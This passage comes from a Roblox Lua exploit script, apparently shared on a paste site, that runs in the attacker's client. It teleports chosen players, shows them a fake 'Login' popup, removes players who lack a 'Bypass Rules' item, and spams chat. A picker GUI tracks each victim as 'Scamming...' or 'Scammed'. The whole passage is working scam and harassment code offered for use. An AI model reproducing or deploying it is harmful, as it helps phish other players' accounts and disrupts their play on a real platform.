  802. if not v.Player.Backpack:FindFirstChild("Bypass Rules") and not v.Player.Character:FindFirstChild("Bypass Rules") then
  803. v.Player:Remove()
  804. end
  805. end
  806. end)
  807. else
  808. getILPopUp(v.Player.Backpack.Login).Visible = true
  809. getPText(v.Player.Backpack.Login).Text = ""
  810. wait()
  811. if not v.Player.Character:FindFirstChild("Login") then
  812. newTool.Parent = v.RoomModel
  813. newTool.Handle.CFrame = v.Player.Character.Head.CFrame
  814. end
  815. end
  816. end
  817. end
  818. end
  819. end
  820. end)
  821. end
  822. end
  823. end)
  824. end
  825. end
  826.  
  827. wait()
  828.  
  829. game.Players.PlayerRemoving:connect(function(playa)
  830. for i,v in pairs(CurrentlyScamming) do
  831. if v.Player == playa then
  832. table.remove(CurrentlyScamming,i)
  833. end
  834. end
  835. end)
  836.  
  837. --[[
  838. local infoGui = Instance.new("ScreenGui",game.CoreGui)
  839. local infoText = Instance.new("TextLabel",infoGui)
  840. infoText.Position = UDim2.new(0,0,1,-20)
  841. infoText.Size = UDim2.new(1,0,0,20)
  842. infoText.FontSize = "Size18"
  843. infoText.Font = "SourceSansBold"
  844. infoText.BackgroundTransparency = 1
  845. infoText.TextColor3 = Color3.new(1,1,1)
  846. infoText.TextXAlignment = "Right"
  847. infoText.Text = "Press 'p' to toggle chat spam."
  848. --]]
  849.  
  850. local mouse = game.Players.LocalPlayer:GetMouse()
  851. mouse.KeyDown:connect(function(key)
  852. if key == "p" then
  853. floodChat = not floodChat
  854. end
  855. end)
  856.  
  857. spawn(function()
  858. while wait(3) do
  859. fixPlayers()
  860. end
  861. end)
  862.  
  863. while wait() do
  864. teleportVictims()
  865. if floodChat then
  866. game.Players:Chat(".")
  867. game.Players:Chat(".")
  868. end
  869. if ScamType == "Normal" then
  870. for i,v in pairs(game.Players:GetPlayers()) do
  871. if StorageType == 1 then
  872. if not game.CoreGui.MRStorage:FindFirstChild(v.Name) and not isScamming(v.Name) and not isBypass(v) and v ~= game.Players.LocalPlayer then
  873.  
  874. end
  875. elseif StorageType == 2 then
  876. if not game.ReplicatedStorage:FindFirstChild("MRStorage") then
  877. MRStorage = Instance.new("Folder",game.ReplicatedStorage)
  878. MRStorage.Name = "MRStorage"
  879. end
  880. if not game.ReplicatedStorage.MRStorage:FindFirstChild(v.Name) and not isScamming(v.Name) and not isBypass(v) and v ~= game.Players.LocalPlayer then
  881. scPlayer(v)
  882. end
  883. end
  884. end
  885. elseif ScamType == "Pick" then
  886. if StorageType == 1 then
  887. if not game.CoreGui.MRStorage:FindFirstChild(v.Name) and not isScamming(v.Name) and not isBypass(v) and v ~= game.Players.LocalPlayer then
  888.  
  889. end
  890. elseif StorageType == 2 then
  891. if not game.ReplicatedStorage:FindFirstChild("MRStorage") then
  892. MRStorage = Instance.new("Folder",game.ReplicatedStorage)
  893. MRStorage.Name = "MRStorage"
  894. end
  895. if not game.CoreGui:FindFirstChild("PickGui") then
  896. local newPickGui = pickGui:Clone()
  897. newPickGui.Parent = game.CoreGui
  898. spawn(function()
  899. local pickGuiList = newPickGui.MainFrame.AccList
  900. local pickGuiResult = newPickGui.MainFrame.UserResult
  901. pickGuiList.CanvasSize = UDim2.new(0,0,0,0)
  902. local function updatePickList()
  903. pickGuiList:ClearAllChildren()
  904. for i,v in pairs(game.Players:GetPlayers()) do
  905. if v ~= player then
  906. local newRes = pickGuiResult:Clone()
  907. newRes.PlayerName.Text = v.Name
  908. newRes.PlayerPic.Image = "http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&userId="..v.UserId
  909. newRes.Position = UDim2.new(0,0,0,40 * #pickGuiList:GetChildren())
  910. if isScamming(v.Name) then
  911. newRes.PlayerStatus.Text = "Scamming..."
  912. end
  913. if isBypass(v) then
  914. newRes.PlayerStatus.Text = "Scammed"
  915. end
  916. newRes.Parent = pickGuiList
  917. pickGuiList.CanvasSize = UDim2.new(0,0,0,40 * #pickGuiList:GetChildren())
  918. newRes.Visible = true
  919. newRes.MouseButton1Down:connect(function()
  920. if not isScamming(v.Name) then
  921. scPlayer(v)
  922. end
  923. end)
  924. end
  925. end
  926. end
  927. updatePickList()
  928. newPickGui.MainFrame.Refresh.MouseButton1Down:connect(function()
  929. updatePickList()
  930. end)
  931. end)
  932. end
  933. end
  934. end
  935. end
  936. end
  937. RealMGX7.MouseButton1Click:connect(onRealMGX7Click)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement